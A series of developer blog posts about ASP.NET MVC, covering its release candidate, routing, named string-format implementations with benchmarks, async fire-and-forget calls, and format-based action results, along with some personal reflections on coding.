asp.net mvc, asp.net comments edit

At long last I am happy, relieved, excited to announce the release candidate for ASP.NET MVC. Feel free to go download it now. I’ll wait right here patiently.

There have been a lot of improvements made since the Beta release so be sure to read the release notes. I’ve tried very hard to be thorough in the notes so do let me know if anything is lacking. We are also pushing new tutorials up to the ASP.NET MVC Website as I write this.

Also, don’t miss ScottGu’s usual epic blog post describing the many improvements. There’s also a post on the Web Tools team blog covering tooling aspects of this release in detail. As I mentioned when we released the Beta, we didn’t have plans for many new features in the runtime, but we did have a lot of tooling improvements to add. I’ve already described some of these changes in a previous blog post, as did ScottGu in his detailed look.

Our goal with this release was to fix all outstanding bugs which we felt were real showstoppers and try to address specific customer concerns. We worked hard to add a bit of spit and polish to this release.

Unfortunately, a few minor bugs did crop up at the last second, but we decided to continue with this RC and fix them afterwards, as the impact appears to be relatively small and they all have workarounds. I wrote about one particular bug so that you’re aware of it.

For now, I want to share a few highlights. This is not an exhaustive list at all. For that, check out Scott’s post and the release notes.

Ajax

Yes, I do know that jQuery released a new version (1.3.1), and no, it is not in this release. :) We just didn’t have time to include it due to the timing of its release. However, we are performing due diligence right now and plan to include it with the RTM.

We did make some changes to our Ajax helpers to recognize the standard X-Requested-With HTTP header used by the major JavaScript libraries such as Prototype.js, jQuery, and Dojo. Thus the IsMvcAjaxRequest method was renamed to IsAjaxRequest and looks for this header rather than our custom one.
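For example, an action can branch on the result of that helper. Here’s a minimal sketch (the GetComments call and the Comments view are made up for illustration):

public ActionResult Comments(int id) {
  var comments = GetComments(id); // hypothetical data access call
  if (Request.IsAjaxRequest()) {
    // The request came in via jQuery, Prototype, Dojo, etc., so return JSON.
    return Json(comments);
  }
  // A normal browser request gets the full view.
  return View(comments);
}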

ControllerContext

ControllerContext no longer inherits from RequestContext, which will improve testing and extensibility scenarios. We would have liked to make changes to RequestContext, but it was introduced as part of the .NET Framework in ASP.NET 3.5 SP1. Thus we can’t change it in our out-of-band release.

Anti Forgery Helpers

These helpers were previously released in our “futures” assembly, but we’ve fixed a few bugs and moved them into the core ASP.NET MVC assembly.

These are helpers which help mitigate Cross-Site Request Forgery (CSRF) attacks. For a great description of these helpers, check out Steve Sanderson’s blog post on the topic.
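The short version of how they’re used: emit a hidden token inside the form with Html.AntiForgeryToken(), and decorate the action that handles the post with the ValidateAntiForgeryToken attribute. A minimal sketch (the action name and parameter are made up for illustration):

// In the view, inside the form:
//   <%= Html.AntiForgeryToken() %>

// On the controller action that handles the post:
[AcceptVerbs(HttpVerbs.Post)]
[ValidateAntiForgeryToken]
public ActionResult UpdateProfile(string displayName) {
  // If the token is missing or doesn't match the cookie, the attribute
  // rejects the request before this code runs.
  return RedirectToAction("Index");
}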

MVC Futures

I added a couple of expression based helpers to the ASP.NET MVC futures assembly, Microsoft.Web.Mvc.dll. These are just samples to demonstrate how one could write such helpers. I’ll add a few more by the time we ship the RTM. Note, if you’re using the old futures assembly, it won’t work with the new RC. You’ll need to update to the new Futures assembly.

In case you missed it the first time, click here for the download.

asp.net comments edit

A while back on a lark, I posted a prototype demonstrating how one could use Routing within Web Forms. This is something you can do today with ASP.NET 3.5 SP1, because of the work we did to separate Routing from ASP.NET MVC. I would have liked to include Web Form Routing as part of the Routing feature when we were working on SP1, but we didn’t have the time to do so in a robust manner before SP1 was locked down.

Since then, Scott Galloway, who just happens to be my office mate, has taken the reins and is the PM in charge of guiding the Web Form Routing feature to be included in ASP.NET 4.0 in a more integrated fashion.

He wrote a blog post earlier today describing some of the ways that routing will be more deeply integrated into ASP.NET such as new properties of the Page class, cool uses of Expression Builders, etc… That’s just a teaser as he promises to go a little more in depth soon.

Technorati Tags: Routing, ASP.NET

code comments edit

UPDATE: Be sure to read Peli’s post in which he explores all of these implementations using PEX. Apparently I have a lot more unit tests to write in order to define the expected behavior of the code.

I recently wrote a post in which I examined some existing implementations of named format methods and then described the fun I had writing a routine for implementing named formats.

In response to that post, I received two new implementations of the method that are worth calling out.

The first was sent to me by Atif Aziz, who I’ve corresponded with via email regarding Jayrock. He noticed that the slowest format method by James had one obvious performance flaw and fixed it up. He then sent me another version that passed all my unit tests. Here it is in full, and it’s much faster than before.

public static class JamesFormatter
{
  public static string JamesFormat(this string format, object source)
  {
    return FormatWith(format, null, source);
  }

  public static string FormatWith(this string format
      , IFormatProvider provider, object source)
  {
    if (format == null)
      throw new ArgumentNullException("format");

    List<object> values = new List<object>();
    string rewrittenFormat = Regex.Replace(format,
      @"(?<start>\{)+(?<property>[\w\.\[\]]+)(?<format>:[^}]+)?(?<end>\})+",
      delegate(Match m)
      {
        Group startGroup = m.Groups["start"];
        Group propertyGroup = m.Groups["property"];
        Group formatGroup = m.Groups["format"];
        Group endGroup = m.Groups["end"];

        values.Add((propertyGroup.Value == "0")
          ? source
          : Eval(source, propertyGroup.Value));

        int openings = startGroup.Captures.Count;
        int closings = endGroup.Captures.Count;

        return openings > closings || openings % 2 == 0
           ? m.Value
           : new string('{', openings) + (values.Count - 1) 
             + formatGroup.Value
             + new string('}', closings);
      },
      RegexOptions.Compiled 
      | RegexOptions.CultureInvariant 
      | RegexOptions.IgnoreCase);

    return string.Format(provider, rewrittenFormat, values.ToArray());
  }

  private static object Eval(object source, string expression)
  {
    try
    {
      return DataBinder.Eval(source, expression);
    }
    catch (HttpException e)
    {
      throw new FormatException(null, e);
    }
  }
}

The other version I got was from another Microsoftie named Henri Wiechers (no blog), who pointed out that a state machine of the sort a parser or scanner would use is well suited for this task. It also makes the code easier to understand if you’re accustomed to state machines.

public static class HenriFormatter
{
  private static string OutExpression(object source, string expression)
  {
    string format = "";

    int colonIndex = expression.IndexOf(':');
    if (colonIndex > 0)
    {
      format = expression.Substring(colonIndex + 1);
      expression = expression.Substring(0, colonIndex);
    }

    try
    {
      if (String.IsNullOrEmpty(format))
      {
        return (DataBinder.Eval(source, expression) ?? "").ToString();
      }
      return DataBinder.Eval(source, expression, "{0:" + format + "}") 
          ?? "";
    }
    catch (HttpException)
    {
      throw new FormatException();
    }
  }

  public static string HenriFormat(this string format, object source)
  {
    if (format == null)
    {
      throw new ArgumentNullException("format");
    }

    StringBuilder result = new StringBuilder(format.Length * 2);      

    using (var reader = new StringReader(format))
    {
      StringBuilder expression = new StringBuilder();
      int @char = -1;

      State state = State.OutsideExpression;
      do
      {
        switch (state)
        {
          case State.OutsideExpression:
            @char = reader.Read();
            switch (@char)
            {
              case -1:
                state = State.End;
                break;
              case '{':
                state = State.OnOpenBracket;
                break;
              case '}':
                state = State.OnCloseBracket;
                break;
              default:
                result.Append((char)@char);
                break;
            }
            break;
          case State.OnOpenBracket:
            @char = reader.Read();
            switch (@char)
            {
              case -1:
                throw new FormatException();
              case '{':
                result.Append('{');
                state = State.OutsideExpression;
                break;
              default:
                expression.Append((char)@char);
                state = State.InsideExpression;
                break;
            }
            break;
          case State.InsideExpression:
            @char = reader.Read();
            switch (@char)
            {
              case -1:
                throw new FormatException();
              case '}':
                result.Append(OutExpression(source, expression.ToString()));
                expression.Length = 0;
                state = State.OutsideExpression;
                break;
              default:
                expression.Append((char)@char);
                break;
            }
            break;
          case State.OnCloseBracket:
            @char = reader.Read();
            switch (@char)
            {
              case '}':
                result.Append('}');
                state = State.OutsideExpression;
                break;
              default:
                throw new FormatException();
            }
            break;
          default:
            throw new InvalidOperationException("Invalid state.");
        }
      } while (state != State.End);
    }

    return result.ToString();
  }

  private enum State
  {
    OutsideExpression,
    OnOpenBracket,
    InsideExpression,
    OnCloseBracket,
    End
  }
}

As before, I wanted to emphasize that this was not a performance contest. I was interested in correctness with reasonable performance.

Now that the JamesFormatter is up to speed, I was able to crank up the number of iterations to 50,000 without testing my patience and tried it again. I also made the format string slightly longer. Here are the new results.

[Chart: named format perf, take 2]

As you can see, they are all very close, though Henri’s method is the fastest.

I went ahead and updated the solution I had uploaded last time so you can try it yourself by downloading it now.

Tags: format strings, named formats

code comments edit

I’ve been having trouble getting to sleep lately, so I thought last night that I would put that to use and hack on Subtext a bit. While doing so, I ran into an old Asynchronous Fire and Forget helper method written way back by Mike Woodring which allows you to easily call a delegate asynchronously.

On the face of it, it seems like you could simply call BeginInvoke on the delegate and be done with it, but Mike’s code addresses a concern with that approach:

Starting with the 1.1 release of the .NET Framework, the SDK docs now carry a caution that mandates calling EndInvoke on delegates you’ve called BeginInvoke on in order to avoid potential leaks. This means you cannot simply “fire-and-forget” a call to BeginInvoke without the risk of running the risk of causing problems.

The mandate he’s referring to, I believe, is this clause in the MSDN docs:

No matter which technique you use, always call EndInvoke to complete your asynchronous call.

Note that it doesn’t explicitly say “or you will get a memory leak”. But a little digging turns up the following comment in the MSDN forums.

The reason that you should call EndInvoke is because the results of the invocation (even if there is no return value) must be cached by .NET until EndInvoke is called.  For example if the invoked code throws an exception then the exception is cached in the invocation data.  Until you call EndInvoke it remains in memory.  After you call EndInvoke the memory can be released.  For this particular case it is possible the memory will remain until the process shuts down because the data is maintained internally by the invocation code.  I guess the GC might eventually collect it but I don’t know how the GC would know that you have abandoned the data vs. just taking a really long time to retrieve it.  I doubt it does.  Hence a memory leak can occur.

The thread continues to have some back and forth and doesn’t appear to be conclusive either way, but this post by Don Box gives a very pragmatic argument.

…the reality is that some implementations rely on the EndXXX call to clean up resources.  Sometimes you can get away with it, but in the general case you can’t.

In other words, why take the chance? In any case, much of this discussion is made redundant by C# 3.0 lambda expressions combined with ThreadPool.QueueUserWorkItem (aka QUWI).

Here is the code in Subtext for sending email, more or less. I have to define a delegate and then pass that to FireAndForget:

// declaration
delegate bool SendEmailDelegate(string to, 
      string from, 
      string subject, 
      string body);

//... in a method body
SendEmailDelegate sendEmail = im.Send;
AsyncHelper.FireAndForget(sendEmail, to, from, subject, body);

This code relies on the FireAndForget method, which I show here. Note that I am not showing the full code; I just wanted to point out that the arguments to the delegate are not strongly typed. They are simply an array of objects, which provides no guidance as to how many arguments you need to pass.

public static void FireAndForget(Delegate d, params object[] args)
{
  ThreadPool.QueueUserWorkItem(dynamicInvokeShim, 
    new TargetInfo(d, args));
}

Also notice that this implementation uses QUWI under the hood.
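For contrast, doing it strictly by the book with BeginInvoke means holding on to the delegate and calling EndInvoke from the completion callback. Roughly something like this, using the SendEmailDelegate declared above (a sketch, not code from Subtext or Mike’s library):

SendEmailDelegate sendEmail = im.Send;
sendEmail.BeginInvoke(to, from, subject, body,
  asyncResult => {
    // Complete the call so the cached invocation data can be released.
    var del = (SendEmailDelegate)asyncResult.AsyncState;
    del.EndInvoke(asyncResult);
  },
  sendEmail);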

With C# 3.0, there is no need to abstract away the call to QUWI. Just pass in a lambda, which provides the benefit that you’re calling the actual method directly, so you get Intellisense for the arguments, etc. So all that code gets replaced with:

ThreadPool.QueueUserWorkItem(callback => im.Send(to, from, subject, body));

Much cleaner and I get to get rid of more code! As I’ve said before, the only thing better than writing code is getting rid of code!

asp.net, asp.net mvc comments edit

Rob pinged me today asking about how to respond to requests using different formats based on the extension in the URL. More specifically, he’d like to respond with HTML if there is no file extension, but with JSON if the URL ends with .json, and so on.

/home/index –> HTML

/home/index.json –> JSON

The first thing I wanted to tackle was writing a custom action invoker that would decide based on what’s in the route data, how to format the response.

This would allow the developer to simply return an object (the model) from an action method and the invoker would look for the format in the route data and figure out what format to send.

So I wrote a custom action invoker:

public class FormatHandlingActionInvoker : ControllerActionInvoker {
  protected override ActionResult CreateActionResult(
      ControllerContext controllerContext, 
      ActionDescriptor actionDescriptor, 
      object actionReturnValue) {
    if (actionReturnValue == null) {
      return new EmptyResult();
    }

    ActionResult actionResult = actionReturnValue as ActionResult;
    if (actionResult != null) {
      return actionResult;
    }

    string format = (controllerContext.RouteData.Values["format"] 
        ?? "") as string;
    switch (format) {
      case "":
      case "html":
        var result = new ViewResult { 
          ViewData = controllerContext.Controller.ViewData, 
          ViewName = actionDescriptor.ActionName 
        };
        result.ViewData.Model = actionReturnValue;
        return result;

      case "rss":
        //TODO: RSS Result
        break;
      case "json":
        return new JsonResult { Data = actionReturnValue };
    }

    return new ContentResult { 
      Content = Convert.ToString(actionReturnValue, 
       CultureInfo.InvariantCulture) 
    };
  }
}

The key thing to note is that I overrode the method CreateActionResult. This method is responsible for examining the result returned from an action method (which can be any type) and figuring out what to do with it. In this case, if the result is already an ActionResult, we just use it. However, if it’s something else, we look at the format in the route data to figure out what to return.

For reference, here’s the code for the HomeController which simply returns an object.

[HandleError]
public class HomeController : Controller {
  public object Index() {
    return new {Title = "HomePage", Message = "Welcome to ASP.NET MVC" };
  }
}

In order to make sure that all my controllers use this invoker rather than the default one, I wrote a controller factory that sets it. I won’t show that code here, but I will include it in the download.
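For the curious, a minimal sketch of such a factory (illustrative, and not necessarily identical to the code in the download) might look like this:

public class FormatHandlingControllerFactory : DefaultControllerFactory {
  protected override IController GetControllerInstance(Type controllerType) {
    var controller = base.GetControllerInstance(controllerType) as Controller;
    if (controller != null) {
      // Replace the default invoker on every controller we create.
      controller.ActionInvoker = new FormatHandlingActionInvoker();
    }
    return controller;
  }
}

It would then be registered in Application_Start via ControllerBuilder.Current.SetControllerFactory(new FormatHandlingControllerFactory()).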

So at this point, we have everything in place, except for the fact that I haven’t dealt with how we get the format in the route data in the first place. Unfortunately, it ends up that this isn’t quite so straightforward. Consider the default route:

routes.MapRoute(
    "Default",
    "{controller}/{action}/{id}",
    new { controller = "Home", action = "Index", id = "" }
);

Since this route allows for default values at each segment, this single route matches all the following URLs:

  • /home/index/123
  • /home/index
  • /home

So the question becomes, if we want to support optional format extensions in the URL, would we have to support it for every segment? Making up a fictional syntax, maybe it would look like this:

routes.MapRoute(
    "Default",
    "{controller{.format}}/{action{.format}}/{id{.format}}",
    new { controller = "Home", action = "Index", id = "", format = ""}
);

Where the {.format} part would be optional. Of course, we don’t have such a syntax available, so I needed to put on my dirty ugly hacking hat and see what I could come up with. I decided to do something we strongly warn people not to do, inheriting HttpRequestWrapper with my own HttpRequestBase implementation and stripping off the extension before I try and match the routes.

Warning! Don’t do this at home! This is merely experimentation while I mull over a better approach. This approach relies on implementation details I should not be relying upon.

public class HttpRequestWithFormat : HttpRequestWrapper
{
  public HttpRequestWithFormat(HttpRequest request) : base(request) { 
  }

  public override string AppRelativeCurrentExecutionFilePath {
    get
    {
      string filePath = base.AppRelativeCurrentExecutionFilePath;
      string extension = System.IO.Path.GetExtension(filePath);
      if (String.IsNullOrEmpty(extension)) {
        return filePath;
      }
      else {
        Format = extension.Substring(1);
        filePath = filePath.Substring(0, filePath.LastIndexOf(extension));
      }
      return filePath;
    }
  }

  public string Format {
    get;
    private set;
  }
}

I also had to write a custom route.

public class FormatRoute : Route
{
  public FormatRoute(Route route) : 
    base(route.Url + ".{format}", route.RouteHandler) {
    _originalRoute = route;
  }

  public override RouteData GetRouteData(HttpContextBase httpContext)
  {
    //HACK! 
    var context = new HttpContextWithFormat(HttpContext.Current);

    var routeData = _originalRoute.GetRouteData(context);
    var request = context.Request as HttpRequestWithFormat;
    if (!string.IsNullOrEmpty(request.Format)) {
      routeData.Values.Add("format", request.Format);
    }

    return routeData;
  }

  public override VirtualPathData GetVirtualPath(
    RequestContext requestContext, RouteValueDictionary values)
  {
    var vpd = base.GetVirtualPath(requestContext, values);
    if (vpd == null) {
      return _originalRoute.GetVirtualPath(requestContext, values);
    }
    
    // Hack! Let's fix up the URL. Since "id" can be empty string,  
    // we want to check for this condition.
    string format = values["format"] as string;
    string funkyEnding = "/." + format;
    
    if (vpd.VirtualPath.EndsWith(funkyEnding)) { 
      string virtualPath = vpd.VirtualPath;
      int lastIndex = virtualPath.LastIndexOf(funkyEnding);
      virtualPath = virtualPath.Substring(0, lastIndex) + "." + format;
      vpd.VirtualPath = virtualPath;
    }

    return vpd;
  }

  private Route _originalRoute;
}

When matching incoming requests, this route replaces the HttpContextBase with my faked up one before calling GetRouteData. My faked up context returns a faked up request which strips the format extension from the URL.

Also, when generating URLs, this route deals with the cosmetic issue that the last segment of the URL has a default value of empty string. This makes it so that the URL might end up looking like /home/index/.json when I really wanted it to look like /home/index.json.

I’ve omitted some code from this blog post, but you can download the project here and try it out. Just navigate to /home/index and then try /home/index.json and you should notice the response format changes.

This is just experimental work. There’d be much more to do to make this useful. For example, it would be nice if an action could specify which formats it responds to. Likewise, it might be nice to respond based on Accept headers rather than URL extensions. I just wanted to see how automatic I could make it.

In any case, I was just having fun and didn’t have much time to put this together. The takeaway from this is really the CreateActionResult method of ControllerActionInvoker. That makes it very easy to create interesting default behavior so that your action methods can return whatever they want and you can implement your own conventions by overriding that method.

Download the hacky experiment here and play with it at your own risk. :)

code, format comments edit

TRIPLE UPDATE! C# now has string interpolation which pretty much makes this post unnecessary and only interesting as a fun coding exercise.

DOUBLE UPDATE! Be sure to read Peli’s post in which he explores all of these implementations using PEX. Apparently I have a lot more unit tests to write in order to define the expected behavior of the code.

UPDATE: By the way, after you read this post, check out the post in which I revisit this topic and add two more implementations to check out.

Recently I found myself in a situation where I wanted to format a string using a named format string, rather than a positional one. Ignore for the moment the issue on whether this is a good idea or not, just trust me that I’ll be responsible with it.

The existing String.Format method, for example, formats values according to position.

string s = string.Format("{0} first, {1} second", 3.14, DateTime.Now);

But what I wanted was to be able to use the name of properties/fields, rather than position like so:

var someObj = new {pi = 3.14, date = DateTime.Now};
string s = NamedFormat("{pi} first, {date} second", someObj);

Looking around the internet, I quickly found three implementations mentioned in this StackOverflow question.

All three implementations are fairly similar in that they all use regular expressions for the parsing. Hanselman’s approach is to write an extension method of object (note that this won’t work in VB.NET until they allow extending object). James and Oskar wrote extension methods of the string class. James takes it a bit further by using DataBinder.Eval on each token, which allows you to have formats such as {foo.bar.baz} where baz is a property of bar which is a property of foo. This is something else I wanted, which the others do not provide.

He also makes good use of the MatchEvaluator delegate argument to the Regex.Replace method, perhaps one of the most underused yet powerful features of the Regex class. This ends up making the code for his method very succinct.
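If you haven’t run across it, the MatchEvaluator overload lets you compute each replacement with a delegate. A tiny illustration (unrelated to the formatting code):

// Double every number found in the input string.
string doubled = Regex.Replace("3 + 4", @"\d+",
  m => (int.Parse(m.Value) * 2).ToString());
// doubled == "6 + 8"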

Handling Brace Escaping

I had a chat about this sort of string parsing with Eilon recently, and he mentioned that many developers tend to ignore escaping or get it wrong. So I thought I would see how these methods handle a simple test of escaping the braces.

String.Format with the following:

Console.WriteLine(String.Format("{{{0}}}", 123));

produces the output (sans quotes) of “{123}”

So I would expect with each of these methods, that:

Console.WriteLine(NamedFormat("{{{foo}}}", new {foo = 123}));

Would produce the exact same output, “{123}”. However, only James’s method passed this test. But when I expanded the test to the following format, “{{{{{foo}}}}}”, all three failed. That should have produced “{{123}}”.

Certainly this is not such a big deal as this really is an edge case, but you never know when an edge case might bite you as Zune owners learned recently. More importantly, it poses an interesting problem - how do you handle this correctly? I thought it would be fun to try.

This is possible to handle correctly using regular expressions, but it’s challenging. Not only are you dealing with balanced matching, but the matching depends on whether the number of consecutive braces are odd or even.

For example, the following “{0}}” is not valid because the right end brace is escaped. However, “{0}}}” is valid. The expression is closed with the leftmost end brace, which is followed by an even number of consecutive braces, which means they are all escaped sequences.
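You can check both cases against plain String.Format:

Console.WriteLine(String.Format("{0}}}", 123)); // prints "123}"
// String.Format("{0}}", 123);                  // throws a FormatException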

Performance

As I mentioned earlier, only James’s method handles evaluation of sub-properties/fields via the use of the DataBinder.Eval method. Critics of his blog post point out that this is a performance killer.

Personally, until I’ve measured it in the scenarios in which I plan to use it, I doubt that the performance will really be an issue compared to everything else going on. But I thought I would check it out anyways, writing a simple console app which runs each method over 1000 iterations and then divides by 1000 to get the number of milliseconds each method takes (see the sketch below).
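The harness itself is nothing fancy; it’s roughly the following, where NamedFormat stands in for whichever implementation is being timed (a sketch, not the exact console app):

var someObj = new { pi = 3.14, date = DateTime.Now };

var stopwatch = Stopwatch.StartNew();
for (int i = 0; i < 1000; i++) {
  NamedFormat("{pi} first, {date} second", someObj);
}
stopwatch.Stop();

// Average milliseconds per call for this implementation.
Console.WriteLine(stopwatch.ElapsedMilliseconds / 1000.0);

Here’s the result: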

[Chart: format perf]

Notice that James’s method is 43 times slower than Hanselman’s. Even so, it only takes 4.4 milliseconds. So if you don’t use it in a tight loop with a lot of iterations, it’s not horrible, but it could be better.

My Implementation

At this point, I thought it would be fun to write my own implementation using manual string parsing rather than regular expressions. I’m not sure my regex-fu is capable of handling the challenges I mentioned before. After implementing my own version, I ran the performance test and saw the following result.

[Chart: haackformat perf]

Nice! By removing the overhead of using a regular expression in this particular case, my implementation is faster than the other implementations, despite my use of DataBinder.Eval. Hopefully my implementation is correct, because fast and wrong is even worse than slow and right.

One drawback to not using regular expressions is that the code for my implementation is a bit long. I include the entire source here. I’ve also zipped up the code for this solution which includes unit tests as well as the implementations of the other methods I tested, so you can see which tests they pass and which they don’t pass.

The core of the code is in two parts. One is a private method which parses and splits the string into an enumeration of segments represented by the ITextExpression interface. The method you call joins these segments together, evaluating any expressions against a supplied object, and returning the resulting string.

I think we could optimize the code even more by joining these operations into a single method, but I really liked the separation between the parsing and joining logic, as it helped me wrap my head around it. Initially, I hoped that I could cache the parsed representation of the format string (since strings are immutable) and re-use it, but it didn’t end up giving me any real performance gain when I measured it.

public static class HaackFormatter
{
  public static string HaackFormat(this string format, object source)
  {

    if (format == null) {
        throw new ArgumentNullException("format");
    }

    var formattedStrings = (from expression in SplitFormat(format)
                 select expression.Eval(source)).ToArray();
    return String.Join("", formattedStrings);
  }

  private static IEnumerable<ITextExpression> SplitFormat(string format)
  {
    int exprEndIndex = -1;
    int expStartIndex;

    do
    {
      expStartIndex = format.IndexOfExpressionStart(exprEndIndex + 1);
      if (expStartIndex < 0)
      {
        //everything after last end brace index.
        if (exprEndIndex + 1 < format.Length)
        {
          yield return new LiteralFormat(
              format.Substring(exprEndIndex + 1));
        }
        break;
      }

      if (expStartIndex - exprEndIndex - 1 > 0)
      {
        //everything up to next start brace index
        yield return new LiteralFormat(format.Substring(exprEndIndex + 1
          , expStartIndex - exprEndIndex - 1));
      }

      int endBraceIndex = format.IndexOfExpressionEnd(expStartIndex + 1);
      if (endBraceIndex < 0)
      {
        //rest of string, no end brace (could be invalid expression)
        yield return new FormatExpression(format.Substring(expStartIndex));
      }
      else
      {
        exprEndIndex = endBraceIndex;
        //everything from start to end brace.
        yield return new FormatExpression(format.Substring(expStartIndex
          , endBraceIndex - expStartIndex + 1));

      }
    } while (expStartIndex > -1);
  }

  static int IndexOfExpressionStart(this string format, int startIndex) {
    int index = format.IndexOf('{', startIndex);
    if (index == -1) {
      return index;
    }

    //peek ahead.
    if (index + 1 < format.Length) {
      char nextChar = format[index + 1];
      if (nextChar == '{') {
        return IndexOfExpressionStart(format, index + 2);
      }
    }

    return index;
  }

  static int IndexOfExpressionEnd(this string format, int startIndex)
  {
    int endBraceIndex = format.IndexOf('}', startIndex);
    if (endBraceIndex == -1) {
      return endBraceIndex;
    }
    //start peeking ahead until there are no more braces...
    // }}}}
    int braceCount = 0;
    for (int i = endBraceIndex + 1; i < format.Length; i++) {
      if (format[i] == '}') {
        braceCount++;
      }
      else {
        break;
      }
    }
    if (braceCount % 2 == 1) {
      return IndexOfExpressionEnd(format, endBraceIndex + braceCount + 1);
    }

    return endBraceIndex;
  }
}
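The ITextExpression interface itself isn’t shown in the listing; based on how HaackFormat and the supporting classes below use it, a minimal definition would be:

public interface ITextExpression
{
  string Eval(object o);
}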

And here is the code for the supporting classes:

public class FormatExpression : ITextExpression
{
  bool _invalidExpression = false;

  public FormatExpression(string expression) {
    if (!expression.StartsWith("{") || !expression.EndsWith("}")) {
      _invalidExpression = true;
      Expression = expression;
      return;
    }

    string expressionWithoutBraces = expression.Substring(1
        , expression.Length - 2);
    int colonIndex = expressionWithoutBraces.IndexOf(':');
    if (colonIndex < 0) {
      Expression = expressionWithoutBraces;
    }
    else {
      Expression = expressionWithoutBraces.Substring(0, colonIndex);
      Format = expressionWithoutBraces.Substring(colonIndex + 1);
    }
  }

  public string Expression { 
    get; 
    private set; 
  }

  public string Format
  {
    get;
    private set;
  }

  public string Eval(object o) {
    if (_invalidExpression) {
      throw new FormatException("Invalid expression");
    }
    try
    {
      if (String.IsNullOrEmpty(Format))
      {
        return (DataBinder.Eval(o, Expression) ?? string.Empty).ToString();
      }
      return (DataBinder.Eval(o, Expression, "{0:" + Format + "}") ?? 
        string.Empty).ToString();
    }
    catch (ArgumentException) {
      throw new FormatException();
    }
    catch (HttpException) {
      throw new FormatException();
    }
  }
}

public class LiteralFormat : ITextExpression
{
  public LiteralFormat(string literalText) {
    LiteralText = literalText;
  }

  public string LiteralText { 
    get; 
    private set; 
  }

  public string Eval(object o) {
    string literalText = LiteralText
        .Replace("{{", "{")
        .Replace("}}", "}");
    return literalText;
  }
}

I mainly did this for fun, though I plan to use this method in Subtext for email formatting.

Let me know if you find any situations or edge cases in which my version fails. I’ll probably be adding more test cases as I integrate this into Subtext. As far as I can tell, it handles normal formatting and brace escaping correctly.

personal comments edit

At the end of the year, it’s very common for bloggers to take a look back at their own blog and list their favorite 10 blog posts. I find that somewhat narcissistic, so you know I’m going to do that.

But before I do, I thought it would be great to list the top 10 blog posts by others I read in 2008. The only problem is, I have very bad short-term memory and I can’t seem to remember which ones I read that had a real impact on my thinking. I’ll have to try and keep better track in 2009.

So based on a cursory Google search and a look through my Google Reader app, here are some of my favorite blog posts of 2008 by you all; I couldn’t even come up with 10. Please do comment with your own favorite blog posts of 2008, mine or otherwise.

Favorite Posts I Read

My Top Posts (Using the Ayende Formula)

A while back, Ayende wrote up a weighted query for Subtext to determine the top posts. I updated it to only include mine published in 2008. Here are the top 5.

Milestone Moments

There are some posts that I personally liked because they represent important events that happened to me in 2008.

Ok, so maybe this post is pretty typical and doesn’t live up to the title I gave it. Oh well, I tried.

I’m sure I’m forgetting a whole lot of other important events that happened in 2008. I’m probably neglecting great blog posts that I read. But that’s the great thing about a blog, I’m confident people will point out my shortcomings in the comments to this post, and for that, I’m grateful. You all rock!

And with that, I leave you with this moment of zen, a photo taken near my house.

[Image: giant snowman]

asp.net, asp.net mvc comments edit

Dmitry, who’s the PUM for ASP.NET, recently wrote a blog post about an interesting approach he took using VB.NET XML Literals as a view engine for ASP.NET MVC.

Now before you VB haters dismiss this blog post and leave, bear with me for just a second. Dmitry and I had a conversation one day and he noted that there are a lot of similarities between our view engine hierarchy and normal class hierarchies.

For example, a master page is not unlike a base class. Content placeholders within a master page are similar to abstract methods. Content placeholders with default content are like virtual methods. And so on…

So he thought it would be interesting to have a class be a view rather than a template file, and put together this VB demo. One thing he left out is what the view class actually looks like in Visual Studio, which I think is kinda cool (click on image for larger view).

[Image: VB.NET XML literal view]

Notice that this looks pretty similar to what you get in the default Index.aspx view. One advantage of this approach is that you’re always using VB rather than switching over to writing markup. So if you forget to close a tag, for example, you get immediate compilation errors.

Another advantage is that your “view” is now compiled into the same assembly as the rest of your code. Of course, this could also be a disadvantage depending how you look at it.

code comments edit

I was reading Jeff Atwood’s latest post, Programming: Love it or Leave it when I came across this part, emphasis mine.

Joel implied that good programmers love programming so much they’d do it for no pay at all. I won’t go quite that far, but I will note that the best programmers I’ve known have all had a lifelong passion for what they do. There’s no way a minor economic blip would ever convince them they should do anything else. No way. No how.

Unlike Jeff, I will go that far. I love to code, and I do it for free all the time.

I don’t think Joel meant to imply that programmers would continue to write code for their current employers for free in lieu of any pay. What I think he meant was that programmers who love to code will code for fun as well as profit. They’ll write code outside of their paying jobs.

For example, I took the entire week off last week and spent lots of time with my family, which was wonderful (cue gratuitous picture of kid)! I trained my son in Ninja acrobatics.

[Image: Cody’s ninja acrobatics]

I got my brother completely hooked on Desktop Tower Defense.

[Image: Brian playing Desktop Tower Defense]

And tried to figure out what sort of mischief my son was involved in, as that face is as guilty as sin.

[Image: mischief]

However, along with all that family fun, I spent nearly every minute of downtime hacking on Subtext. I went on a huge refactoring binge cleaning up stale code, separating concerns left and right, and replacing the old method of matching requests with ASP.NET Routing.

And it was huge fun!

And I’m not alone. I noticed several streams on Twitter of folks having fun writing code, such as Glenn Block sharing his “learning in the open” experiences, among others.

Developers I’ve worked with who really love to code, tend to do it for fun, as well as for work. Personally, I don’t think it’s unhealthy as long as it’s not the only thing you do for fun. And I’m not suggesting that if you don’t do it for fun, you don’t love to code. Some people work so much, they don’t have time to do it for fun, but would code for fun if they had copious free time.

As for me, I’ll say it again, I <3 to code.

asp.net, asp.net mvc comments edit

A while ago ScottGu mentioned in his blog that we would try to have an ASP.NET MVC Release Candidate by the end of this year. My team worked very hard at it, but due to various unforeseeable circumstances, I’m afraid that’s not gonna happen. Heck, I couldn’t even get into the office yesterday because of the massive dumping of snow. I hope to get in today a little later since I’m taking next week off to be with my family coming in from Alaska.

But do not fret, we’ll have something early next year to release. In the meanwhile, we gave some rough bits to Scott Guthrie to play with and he did not disappoint yet again with a great, detailed post on some upcoming new features both in the runtime and in tooling.

[Image: look ma, no code-behind] Often, it’s the little touches that get me excited, and I want to call one of those out: Views without Code-Behind. This was always possible, of course, but thanks to some incredible hacking down in the plumbing of ASP.NET, David Ebbo, with some assistance from Eilon Lipton, figured out how to get it to work with generic types using your language-specific syntax for generic types. If you recall, it previously required using that complex CLR syntax within the Inherits attribute.

Keep in mind that they had to do this without touching the core ASP.NET bits since ASP.NET MVC is a bin-deployable out-of-band release. David provided some hints on how they did this within his blog in these two posts: ProcessGeneratedCode: A hidden gem for Control Builder writers and Creating a ControlBuilder for the page itself.

 

In the meanwhile, Stephen Walther has been busy putting together a fun new section of the ASP.NET MVC website called the ASP.NET MVC Design Gallery.

In one of my talks about ASP.NET MVC, I mentioned a site that went live with our default drab blue project template (the site has since redesigned its look entirely). The Design Gallery provides a place for the community to upload alternative designs for our default template.

Happy Holidays

